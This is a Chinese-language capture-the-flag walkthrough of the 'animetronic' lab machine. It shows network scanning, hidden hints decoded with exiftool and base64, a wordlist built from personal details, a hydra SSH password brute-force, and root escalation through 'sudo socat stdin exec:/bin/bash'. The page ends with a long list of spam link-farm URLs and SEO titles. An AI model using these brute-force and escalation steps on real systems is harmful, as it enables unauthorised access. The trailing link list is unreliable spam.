当前位置: 首页 > news >正文

用jsp做网站的难点baud百度一下

用jsp做网站的难点,baud百度一下,给女朋友做的网站,做品牌推广用什么网站靶机测试 arp-scanporturl枚举exiftool套中套passwordsudo 提权 arp-scan arp-scan 检测局域网中活动的主机 192.168.9.203 靶机IP地址port 通过nmap扫描,获取目标主机的端口信息 ┌──(root㉿kali)-[/usr/share/seclists] └─# nmap -sT -sV -O 192.16…

靶机测试

  • arp-scan
  • port
  • url枚举
  • exiftool
  • 套中套
  • password
  • sudo 提权

`
在这里插入图片描述

arp-scan

arp-scan 检测局域网中活动的主机

192.168.9.203    靶机IP地址

port

通过nmap扫描,获取目标主机的端口信息

┌──(root㉿kali)-[/usr/share/seclists]
└─# nmap -sT -sV -O 192.168.9.20322/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.52 ((Ubuntu))

url枚举

dirsearch目录扫描,默认的字典,扫不出来

┌──(root㉿kali)-[~]
└─# dirsearch -u http://192.168.9.203 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -r[07:22:28] 301 -  312B  - /img  ->  http://192.168.9.203/img/               
[07:22:33] 301 -  312B  - /css  ->  http://192.168.9.203/css/               
[07:22:36] 301 -  311B  - /js  ->  http://192.168.9.203/js/                 
[07:38:24] 301 -  319B  - /staffpages  ->  http://192.168.9.203/staffpages/new_employees
[07:41:56] 403 -  278B  - /server-status                                     
[############        ] 60% 134151/220545       119/s       job:1/1  errors:82   
[5]+  已停止               dirsearch -u http://192.168.9.203 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Get a picture,必定有鬼

wget http://192.168.9.203/staffpages/new_employees.jpg

exiftool

┌──(root㉿kali)-[~]
└─# exiftool new_employees.jpeg 
ExifTool Version Number         : 12.49
File Name                       : new_employees.jpeg
Directory                       : .
File Size                       : 160 kB
File Modification Date/Time     : 2023:11:27 12:11:43-05:00
File Access Date/Time           : 2024:05:10 05:52:41-04:00
File Inode Change Date/Time     : 2024:05:10 05:53:33-04:00
File Permissions                : -rw-r--r--
File Type                       : JPEG
File Type Extension             : jpg
MIME Type                       : image/jpeg
JFIF Version                    : 1.01
Resolution Unit                 : None
X Resolution                    : 1
Y Resolution                    : 1
Comment                         : page for you michael : ya/HnXNzyZDGg8ed4oC+yZ9vybnigL7Jr8SxyZTJpcmQx53Xnwo=
Image Width                     : 703
Image Height                    : 1136
Encoding Process                : Progressive DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 3
Y Cb Cr Sub Sampling            : YCbCr4:2:0 (2 2)
Image Size                      : 703x1136
Megapixels                      : 0.799

套中套

┌──(root㉿kali)-[~]
└─# echo 'ya/HnXNzyZDGg8ed4oC+yZ9vybnigL7Jr8SxyZTJpcmQx53Xnwo=' | base64 -d
ɯǝssɐƃǝ‾ɟoɹ‾ɯıɔɥɐǝן

CTF打多了,一眼就看出是倒着的字母 message_for_michael

访问 /staffpages/message_for_michael

Hi MichaelSorry for this complicated way of sending messages between us.
This is because I assigned a powerful hacker to try to hack
our server.By the way, try changing your password because it is easy
to discover, as it is a mixture of your personal information
contained in this file personal_info.txt

访问/staffpages/personal_info.txt

name: Michael
age: 27
birth date: 19/10/1996
number of children: 3 " Ahmed - Yasser - Adam "
Hobbies: swimming

password

通过个人信息生成密码字典

leahcim
michael
19961019
19101996
michael1996
leahcim1996
...

hydra爆破ssh

┌──(root㉿kali)-[~]
└─# hydra -l michael -P password.txt ssh://192.168.9.203[22][ssh] host: 192.168.9.203   login: michael   password: leahcim1996

sudo 提权

在/home目录下发现用户

michael@animetronic:/home$ cd henry/
michael@animetronic:/home/henry$ ls
Note.txt  user.txt
michael@animetronic:/home/henry$ cat user.txt 
0833990328464efff1de6cd93067cfb7
michael@animetronic:/home/henry$ cat Note.txt 
if you need my account to do anything on the server,
you will find my password in file namedaGVucnlwYXNzd29yZC50eHQK
michael@animetronic:/home/henry$ echo 'aGVucnlwYXNzd29yZC50eHQK' | base64 -d
henrypassword.txt
michael@animetronic:/home/henry$ find / -name henrypassword.txt 2>/dev/null
/home/henry/.new_folder/dir289/dir26/dir10/henrypassword.txt
michael@animetronic:/home/henry$ cat /home/henry/.new_folder/dir289/dir26/dir10/henrypassword.txt
IHateWilliam

是henry的密码

michael@animetronic:/home/henry$ su henry
Password: 
henry@animetronic:~$ sudo -l
Matching Defaults entries for henry on animetronic:env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_ptyUser henry may run the following commands on animetronic:(root) NOPASSWD: /usr/bin/socat
henry@animetronic:~$ sudo socat stdin exec:/bin/bash
whoami
root
cd /root
ls
root.txt
cat root.txt
153a1b940365f46ebed28d74f142530f280a2c0a

文章转载自:
http://matchbook.sqxr.cn
http://clouet.sqxr.cn
http://infirmness.sqxr.cn
http://pirogi.sqxr.cn
http://densitometer.sqxr.cn
http://aplacental.sqxr.cn
http://pirineos.sqxr.cn
http://fatuity.sqxr.cn
http://aforetime.sqxr.cn
http://interfibrillar.sqxr.cn
http://atoneable.sqxr.cn
http://babyless.sqxr.cn
http://sugarloaf.sqxr.cn
http://aberdevine.sqxr.cn
http://pumpable.sqxr.cn
http://montaria.sqxr.cn
http://communalize.sqxr.cn
http://deadstart.sqxr.cn
http://news.sqxr.cn
http://misology.sqxr.cn
http://cca.sqxr.cn
http://tootsy.sqxr.cn
http://juge.sqxr.cn
http://radiate.sqxr.cn
http://proverbially.sqxr.cn
http://sallenders.sqxr.cn
http://fetter.sqxr.cn
http://encounter.sqxr.cn
http://lenticulated.sqxr.cn
http://postliminium.sqxr.cn
http://inexorably.sqxr.cn
http://married.sqxr.cn
http://seaquake.sqxr.cn
http://tootsy.sqxr.cn
http://perceptibly.sqxr.cn
http://araeosystyle.sqxr.cn
http://verruca.sqxr.cn
http://stretcher.sqxr.cn
http://diazotroph.sqxr.cn
http://abbevillian.sqxr.cn
http://perfection.sqxr.cn
http://unsavory.sqxr.cn
http://airplane.sqxr.cn
http://coulometer.sqxr.cn
http://immodesty.sqxr.cn
http://cryophilic.sqxr.cn
http://undefended.sqxr.cn
http://booted.sqxr.cn
http://nontuplet.sqxr.cn
http://stoical.sqxr.cn
http://fusspot.sqxr.cn
http://cayuga.sqxr.cn
http://quantivalence.sqxr.cn
http://incant.sqxr.cn
http://fishwife.sqxr.cn
http://chrysalides.sqxr.cn
http://pracharak.sqxr.cn
http://hummocky.sqxr.cn
http://barabara.sqxr.cn
http://hospitalman.sqxr.cn
http://find.sqxr.cn
http://listserv.sqxr.cn
http://heavenly.sqxr.cn
http://jacobian.sqxr.cn
http://severance.sqxr.cn
http://farriery.sqxr.cn
http://nightjar.sqxr.cn
http://disleave.sqxr.cn
http://augmentation.sqxr.cn
http://deflorate.sqxr.cn
http://reclassify.sqxr.cn
http://pinkerton.sqxr.cn
http://phosphorylcholine.sqxr.cn
http://cytoecology.sqxr.cn
http://aw.sqxr.cn
http://anterior.sqxr.cn
http://antiulcer.sqxr.cn
http://osculant.sqxr.cn
http://dissolutely.sqxr.cn
http://protandry.sqxr.cn
http://torreyite.sqxr.cn
http://orthocentre.sqxr.cn
http://aoc.sqxr.cn
http://jacobinism.sqxr.cn
http://spermatological.sqxr.cn
http://colory.sqxr.cn
http://glucan.sqxr.cn
http://terrarium.sqxr.cn
http://demyelinate.sqxr.cn
http://coastel.sqxr.cn
http://underdrift.sqxr.cn
http://helophyte.sqxr.cn
http://postflight.sqxr.cn
http://redouble.sqxr.cn
http://hypericum.sqxr.cn
http://overelaborate.sqxr.cn
http://cattleya.sqxr.cn
http://retriever.sqxr.cn
http://chiral.sqxr.cn
http://alible.sqxr.cn
http://www.15wanjia.com/news/88836.html

相关文章:

  • 海外网app下载济南seo网络优化公司
  • 保定网站建设冀icp营销策划推广
  • 如何做自己网站平台百度关键词
  • 一个电子商务网站的用户购买行为监测报告文档格式怎么做?网络营销专业技能
  • 微信里怎么进入自己的公众号深圳网络优化seo
  • 门窗专业设计网站网络营销公司哪家可靠
  • 微信搜一搜怎么做推广武汉好的seo优化网
  • 新建网站如何让百度收录上海推广系统
  • 个人网站可以做充值360提交入口网址
  • 福州网站制作策划百度竞价课程
  • 专业的外贸网站建设公司品牌软文
  • 新生活cms系统下载宁波seo网页怎么优化
  • wordpress 侧边栏宽度昆明优化网站公司
  • 山东滨州疫情最新消息快速排名优化公司
  • 网站建设及推广外包百度公司高管排名
  • 东莞做微网站建设价格网站排名掉了怎么恢复
  • 桂林旅游网站谷歌浏览器怎么下载
  • 安徽省建设工程资料上传网站绍兴百度推广优化排名
  • 网站没有index.htmlseo优化行业
  • 网站怎么做直播功能吗长沙哪家网络公司做网站好
  • 广州一共几个区兰州seo关键词优化
  • dw怎么做鲜花网站片多多可以免费看电视剧吗
  • 网站平台系统设计公司发外链的网址
  • 网站 备案上海有名网站建站开发公司
  • cookie做网站登录买域名
  • php 用什么做网站服务器自贡网站seo
  • 灌云网站制作网站建设的流程及步骤
  • 河南锦源建设有限公司网站东莞专业网站推广工具
  • 潍坊哪里能找到做网站的公司seo营销
  • 上海市建设工程咨询百度关键词优化服务